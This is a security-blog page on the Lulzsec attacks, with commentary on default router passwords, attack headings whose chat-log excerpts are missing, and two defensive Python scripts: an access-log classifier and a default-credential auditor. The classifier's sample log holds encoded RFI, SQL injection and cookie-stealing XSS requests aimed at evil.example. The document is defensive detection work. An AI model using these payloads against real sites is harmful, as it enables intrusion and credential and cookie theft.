
Security business


Should I Change My Password?

What to do regarding lulzsec dox : modnews

Take a bow everybody, the security industry really failed this time. I haven't said anything about Lulzsec publicly yet, and I don't really have a good reason for the lack of comment. I have been watching their activities with great amusement. On Saturday I saw they released a large list of router IP addresses and the usernames and passwords. The passwords looked like they were set to default values. This actually made me laugh out loud, and I had two thoughts. First and foremost, how was this allowed to happen if you are doing regular security checks?

The second thought is who will take the blame for this from the offending company? First off, I've heard a lot of people say that Lulzsec did security a favor by really showing the need for security. Putting your security in the hands of tools will fail you every time. A tool is a device that helps you accomplish a goal, not a magic device that will accomplish the goal by itself. How did all those routers go with easy-to-guess usernames and passwords and nobody in the company noticed?

Analyzing the Lulzsec Attacks

We analyzed the chat logs from Lulzsec that were provided in the Guardian.

Specifically, we tried to analyze the technical approach used to bring down websites and steal data. Hopefully, our analysis can give security teams and even non-techies insights into how Lulzsec carried out their attacks and, more importantly, help tune defenses. (We'd also recommend looking at Byron's blog for some other lessons.) Lulzsec was a team of hackers focused on breaking applications and databases. There were no virus or malware experts. Even their approach to distributed denial of service (DDoS) attacks relied on weaknesses in applications. We hope this episode helps bring attention to the fact that the center of gravity has shifted from firewalls and anti-virus to applications and databases.

Here's a breakdown of the major technical tools used to hack sites worldwide:

Tool #1: Remote File Include

The relevant snippet from the chat log (emphasis ours):

Tool #2: SQL Injection

Tool #3: Cross Site Scripting
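All three tools in the breakdown above arrive through request parameters, so one concrete way to "tune defenses" is a log-side check that flags them. The following is an added example and is not Imperva's analysis code, Lulzsec's tooling, or any product's rule set: it parses combined-format access log lines, decodes each query parameter, and classifies the value as remote file include, SQL injection or cross-site scripting using starting-point regular expressions. The log lines, IP addresses and the hostname evil.example are constructed for illustration; the patterns are deliberately simple and will need tuning against real traffic.

```python
"""Classify access-log requests as RFI, SQL injection or XSS.

Added example, not code from the original post. SAMPLE_LOG is constructed;
the regular expressions are a starting point for a WAF/SIEM rule, not a
complete signature set.
"""
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Apache/nginx "combined" format: ip - - [time] "METHOD target HTTP/x" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Remote File Include: parameter value is a remote URL or a PHP stream wrapper.
RFI_RE = re.compile(r'^(?:https?|ftp)://|^(?:php|data|expect)://', re.I)

# SQL injection: tautologies, UNION extraction, comment terminators,
# stacked statements and time-based blind probes.
SQLI_RE = re.compile(
    r"'\s*or\s+'?\d+'?\s*=\s*'?\d+"          # ' OR '1'='1
    r"|\bunion\s+(?:all\s+)?select\b"        # UNION SELECT ...
    r"|--\s*$|/\*.*?\*/"                     # -- and /* */ comments
    r"|;\s*(?:drop|insert|update|delete)\b"  # stacked queries
    r"|\b(?:sleep|benchmark|waitfor)\s*\(",  # time-based probes
    re.I,
)

# Cross-site scripting: script tags, event handlers, javascript: URLs, tag sinks.
XSS_RE = re.compile(
    r'<\s*script\b|\bon\w+\s*=|javascript:|<\s*(?:img|svg|iframe)\b', re.I
)

# Constructed sample log (RFC 5737 test addresses, fictional hostname).
SAMPLE_LOG = [
    '203.0.113.5 - - [20/Jun/2011:10:01:02 +0000] "GET /index.php?page=http%3A%2F%2Fevil.example%2Fshell.txt%3F HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.6 - - [20/Jun/2011:10:01:05 +0000] "GET /news.php?id=1%27%20UNION%20SELECT%20username%2Cpassword%20FROM%20users-- HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [20/Jun/2011:10:01:09 +0000] "GET /search.php?q=%3Cscript%3Edocument.location%3D%27http%3A%2F%2Fevil.example%2F%3Fc%3D%27%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [20/Jun/2011:10:01:12 +0000] "GET /news.php?id=42 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.10 - - [20/Jun/2011:10:01:15 +0000] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]


def classify_value(value):
    """Return 'rfi', 'sqli' or 'xss' for one decoded parameter value, else None."""
    if RFI_RE.search(value):
        return "rfi"
    if SQLI_RE.search(value):
        return "sqli"
    if XSS_RE.search(value):
        return "xss"
    return None


def parse_line(line):
    """Split one combined-format line into ip, path and decoded query parameters."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    # parse_qsl decodes once; decode a second time because attackers
    # double-encode payloads to slip past filters that decode only once.
    params = [(k, unquote(v)) for k, v in parse_qsl(parts.query, keep_blank_values=True)]
    return {"ip": m.group("ip"), "path": parts.path, "status": m.group("status"), "params": params}


def scan_log(lines):
    """Return (ip, path, parameter, class) for each request that matches a pattern."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for name, value in rec["params"]:
            cls = classify_value(value)
            if cls:
                hits.append((rec["ip"], rec["path"], name, cls))
                break  # one finding per request is enough to raise an alert
    return hits


if __name__ == "__main__":
    for ip, path, name, cls in scan_log(SAMPLE_LOG):
        print(f"{cls.upper():5} {ip:<14} {path} param={name}")
```

The classifier runs on decoded values rather than the raw request line, which is what lets it catch the percent-encoded payloads above; checking RFI first avoids mislabelling a wrapper URL whose later characters happen to look like another class. Treat a match as a trigger for review, not proof of compromise: the same regexes will fire on legitimate content that quotes SQL or HTML.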
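The first post above asks how routers with default usernames and passwords go unnoticed when "regular security checks" are supposedly being done. As an added example (not the post author's code, and not tied to any real device list), here is the kind of inventory audit that would have caught them: it reads a CSV of device IPs and credentials and flags vendor defaults, blank passwords, and passwords equal to the username. The inventory rows and the default-credential pairs are constructed assumptions; in practice the inventory comes from a CMDB or configuration backup and the default list from the vendors actually deployed.

```python
"""Flag devices in a credential inventory that still use weak or default logins.

Added example, not from the original post. INVENTORY and DEFAULT_CREDS are
constructed for illustration.
"""
import csv
import io

# Illustrative (assumed) vendor default pairs; extend for your own estate.
DEFAULT_CREDS = {
    ("admin", "admin"),
    ("admin", "password"),
    ("admin", ""),
    ("root", "root"),
    ("cisco", "cisco"),
    ("user", "user"),
}
# Compare case-insensitively: "Password" is not meaningfully stronger than "password".
_NORMALISED_DEFAULTS = {(u.lower(), p.lower()) for u, p in DEFAULT_CREDS}

# Constructed inventory export (RFC 5737 test addresses).
INVENTORY = """\
ip,username,password
192.0.2.1,admin,admin
192.0.2.2,admin,Tr0ub4dor&3
192.0.2.3,root,root
192.0.2.4,admin,
192.0.2.5,ops,ops
192.0.2.6,ADMIN,Password
"""


def weaknesses(username, password):
    """Return the reasons a credential pair is weak; an empty list means none found."""
    reasons = []
    u = username.lower()
    if (u, password.lower()) in _NORMALISED_DEFAULTS:
        reasons.append("vendor-default")
    if not password:
        reasons.append("blank-password")
    elif password.lower() == u:
        reasons.append("password-equals-username")
    return reasons


def audit(inventory_csv):
    """Return {ip: [reasons]} for every device whose credential is weak."""
    findings = {}
    for row in csv.DictReader(io.StringIO(inventory_csv)):
        reasons = weaknesses(row["username"], row["password"])
        if reasons:
            findings[row["ip"]] = reasons
    return findings


if __name__ == "__main__":
    for ip, reasons in audit(INVENTORY).items():
        print(f"{ip}: {', '.join(reasons)}")
```

Run on a schedule against every network device you own, this is the check the post is asking about; the interesting output is not the matches but any device that is missing from the inventory in the first place, because an unmanaged router is exactly the one nobody will have reset.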